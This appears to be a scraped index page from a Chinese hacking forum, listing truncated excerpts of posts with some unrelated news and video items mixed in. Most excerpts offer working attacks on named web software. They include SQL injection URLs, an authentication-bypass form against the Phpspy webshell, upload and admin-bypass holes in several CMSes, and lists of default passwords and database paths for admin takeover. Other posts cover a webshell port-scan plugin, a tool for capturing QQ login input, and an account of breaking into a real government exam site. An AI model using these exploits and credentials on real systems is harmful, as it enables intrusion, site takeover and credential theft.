By:fjhgx 以下是引用片段: if($cateid) { $container.=' and grouptype="'.$cateid.'"'; } if($cityid) { $container.=' and cityid="'.$cityid.'"'; } $order=" order by recommend desc,sortorder desc"; $sql="select * from ".tname('groups')." where 1".$container." and ispassed=1 and lasttime>=".time().$order; 利用方式: http://localhost/api/apidata.php?container=1{sql}
phpstcms (STCMS音乐系统) 绕过后台验证方法
By:心灵 一个音乐系统 -0-!扔在硬盘也等于发霉,经典对白看代码。漏洞存在于“common.inc.php”文件中,具体如下。 commo
【转载】一种 Linux 下隐藏文件的新方法
一. 概述 目前通用的隐藏文件方法还是hooksys_getdents64系统调用,大致流程就是先调用原始的sys_getdents64系统调
【精品】狼、狐狸、王八和兔子的故事【精品】
兔子月薪5千,打算用20万建一个窝。 狼不允许,说私自建就是违章建筑,只允许向王八买。 王八是搞房地产的,先用20万贿赂狼取得开发权,再用
盘石中国 asp 后台管理系统 上传漏洞
By:红雪 官方:http://www.chpanshi.net/ Ver:asp 企业版本,后台构造基本上一摸一样。 大牛绕过,这个没技术
烈火文章后台管理系统 V2.1 0day
By:暗月式 今天无聊就找了个简单的系统来分析学习,首先打开 article.asp 见如此语句: 以下是引用片段: </TR></TBODY></TABLE></TD> <TD vAlign=top align=middle width=1 bgColor=#cccccc></TD> <TD vAlign=top align=middle width=592 bgColor=#ffffff> <% set rs=conn.execute("select * from article where id="&a
Pub918 软件公司网站系统 1.3 存在多处漏洞
0x0,默认后台及数据库: 后台:admin/ 默认数据库:admin/db/N%23%23ews.mdb 0x1,ewebeditor 问题:
中国菜刀的两个小插件(asp) 扫描常用端口+读取终端端口
By:nowake 中国菜刀的两个小插件(asp),扫描常用端口,读取终端端口(3389、Mstsc)。 扫描常用端口: ip="127.0.0.1" port="21,23,80,3306,1433,3389,43958" arrport=Split(port,",") For i=0 To Ubound(arrport) If Isnumeric(arrport(i))
【视频】猛裸男,抄起AK干翻警方机器人(价值六万五千美元)!
猛裸男,抄起AK干翻警方机器人 Naked Man With AK-47 Fires At SWAT Robot,Naked Man With AK-47 Fires At SWAT Robot - Orlando News Story - WESH Orlando_2。 墨尔本的一个男人被邻居举
修改版 spider php shell,集成常用linux命令!
注意:很可能有后门,请自行判断使用! By:chowner 这个webshell里在命令执行部分集成了一些有用的命令,好处是给linux新
入侵 www.gongwuyuan.com.cn (中国公务员考试中心) 全过程
By:ytmsdy 入侵 www.gongwuyuan.com.cn (中国公务员考试中心) 全过程。 入侵这个网站也是一个偶然的机会,我朋友要考公务员想要下载一些资料,但是很多都是会
QQ2010 登录过程演示工具 - 截获用户输入的过程
花了一点精力,做了如下 QQ2010 版本的登录过程演示工具,主要是用于演示如何截取用户登录时的输入。此工具的原理比较基本,主要是利用全局钩子截获用户的
使用 Delphi 编写 QQ2009、QQ2010、TM2009 批量自动登陆工具
使用 Delphi 编写 QQ2009、QQ2010、TM2009 批量自动登陆工具。 因为自己的QQ号码有好几个,每次重启机子的时候一个一个的登录超级麻烦
各种常见虚拟主机目录、路径对照表
星外虚拟主机主机 D:\freehost\zhoudeyang\web\ Prim@Hosting虚拟主机 D:\hosting\wwwroot\ vhostroot分支 D:\Vhost\WebRoot\51dancecn\ vhostroot D:\vhostroot\localuser\ 星外分支 D:\vhostroot\LocalUser\gdrt\ 新网虚拟主机 D:\virtualhost\web580651\www\ 华众虚拟主机 E:\wwwroot\longzhihu\wwwroot\ 星外分支 F:\host\wz8088\web\ 万网虚拟主机
Phpspy 2010 身份验证绕过漏洞
作者:未知 …… EXP代码: <form method="POST" action="https://lcx.cc/phpspy2010.php"> <input type="hidden" name="admin['pass']" value="1"> <input type="submit" value="Login"> </form> 在每次向 shell 请求数据的时候,都附加 post 一个 admin['pass'] 即可。 形成原因: 2009不存在该洞,仅限201
文化部宣布在网络上封杀《使命召唤》《GTA》
原文链接:http://www.3dmgame.com/news/201104/26167.html,http://game.17173.
【转载】使用 Fonera 在路由里破解 WEP 密码
By:Black Boy 这是以前我写的一篇文章,转过来吧!Fonera是一款路由器的名称,现在比较难买到了,淘宝上价钱被炒高了,这款路由很小巧
浅析 postgresql 数据库攻击技术
postgresql简单介绍: PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统,可以说是目前世界上最先进,功能
MSSQL中两种特别的执行命令的方法
By:Setheo Date:2009-12-15 21:12 以下方法可能带有攻击性,请各位同学不要用于入侵。另,感谢高兴先生提供思路。 以下方法
百度文章修改 恶意提高浏览量的测试 百度文章刷访问量
By:BlAck.Eagle 早就发现这个地方有问题,可以导致恶意刷访问量。 在百度发表文章一篇,然后点击编辑,抓包,如下: POST /test/commit HTTP/1.1 Host: hi.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
一次PHP手工注入与权限获得
小菜文章,大N勿喷 -------------------------------------- 原创教程BY :maya663 -------------------------------------- PHP手工注入基础 想学习的看了这篇绝对经典 --------------------------- 最近碰到一个站PHP站 http://xxx.com/ http://xxx.com/index.php?id=112 这上注入点 判断依据:and 1=1 and 1=2 你
樱桃企业网站管理系统 v1.0 上传漏洞
By:黑皮 虽说这款是“樱桃企业网站管理系统”,但是被很多人改来改去,这个EW 5.5解析漏洞使用没有修复。 软件介绍: 樱桃企业网站管理系统
【视频】笃坪小学700学生齐跳MJ舞蹈 课间操 太TM霸气了!
过去的课间操弱爆了 笃坪小学700学生齐跳MJ舞蹈,视频。过去的课间操弱爆了,卧槽,太TM霸气了,太霸气了,太威武了。。 一切广播体操已经无法阻
易天科技商城 2.1 免费版漏洞
By:笨子 是免费版的,再次注意是免费版的,又是没技术含量的洞。 看不懂代码,瞎蒙的,没几个能成功,求一套商业版的系统。 ------------------------------------------------------------------------------------- 搜索关键词:in
解析人类最常用的密码 有史以来说得出的最糟糕500个密码
From the moment people started using passwords, it didn't take long to realize how many people picked the very same passwords over and over. Even the way people misspell words is consistent. In fact, people are so predictable that most hackers make use of lists of common passwords just like these. To give you some insight into how predictable humans are, the following is a list of the 500 most
渗透底层路由技术 渗透底层路由简化入侵过程
掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制
一个 QQ 拍卖系统 ewebeditor 问题,批量拿站
批量关键字: inurl:QQsales.asp 后台地址: editer/admin_login.asp 默认账号: admin admin 如果密码不对,可以下载:editer/db/ewebeditor.mdb,然后读取密码。 我
Siteserver CMS 最新批量拿站 0DAY
注册一个 a.asp 的用户,登陆后上传改名字的后门就行了。 注册地址:htpp://lcx.cc/UserCenter/register.aspx
动易的默认数据库、用户和密码、认证码大全还有找后台方法
admin admin888 'or'='or' 8888 2007 2008 2006 SiteManageCode8888/SiteManageCode database/SiteWeaver6.5.mdb database/SiteWeaver.mdb PowerEasy2006 PowerEasy2007 PowerEasy2008 database/PowerEasy2006.mdb database/PowerEasy2007.mdb database/PowerEasy2008.mdb 找后台方法: 这个方法很巧,但也不是全部都行,因为有些的已经修改admin_login.asp的名称,针对修
【公告】本站部分已失效友情链接修改、摘除通知
今天看了一下,有些友情链接失效了,所以摘除了。在以下列表里有摘除的链接,以及具体原因。本站会不定期检查友情链接,同时也欢迎新朋友前来做友情